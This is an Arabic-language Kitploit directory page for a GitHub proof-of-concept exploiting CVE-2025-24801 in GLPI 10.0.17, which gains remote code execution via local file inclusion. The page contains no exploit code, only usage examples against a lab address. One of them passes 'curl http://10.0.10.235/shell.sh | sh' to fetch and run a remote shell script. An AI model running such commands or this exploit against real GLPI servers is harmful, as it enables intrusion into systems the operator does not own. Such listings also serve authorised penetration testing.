Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit-CVE-2025-24801 | Kitploit
أدوات/GitHubGitHub/r1beirin/exploit-cve-2025-24801
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubr1beirin/exploit-cve-2025-24801

Exploit-CVE-2025-24801

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24801

يستخدم هذا الاستغلال ثغرة CVE-2025-24801 للحصول على تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر تضمين الملفات المحلية (LFI) في GLPI 10.0.17. إثبات المفهوم (PoC) لهذه الثغرة مع شرح لهذه الثغرة الأمنية في GLPI.

ملاحظة

تعرض بعض التطبيقات نقطة النهاية /glpi/ (مثل: http://172.16.11.130:8080/glpi/front/computer.form.php). إذا كان التطبيق المستهدف يتضمن نقطة النهاية هذه، فمن الضروري إضافتها إلى المعامل --url (مثل: --url http://172.16.11.130:8080/glpi).

الاستخدام

مثال على الاستخدام.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password

إذا كنت قد نفّذت هذا الاستغلال بالفعل وقمت بتشغيل RCE، يمكنك استخدام المعامل --cmd لتنفيذ الأمر فقط.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
تنزيل الأداة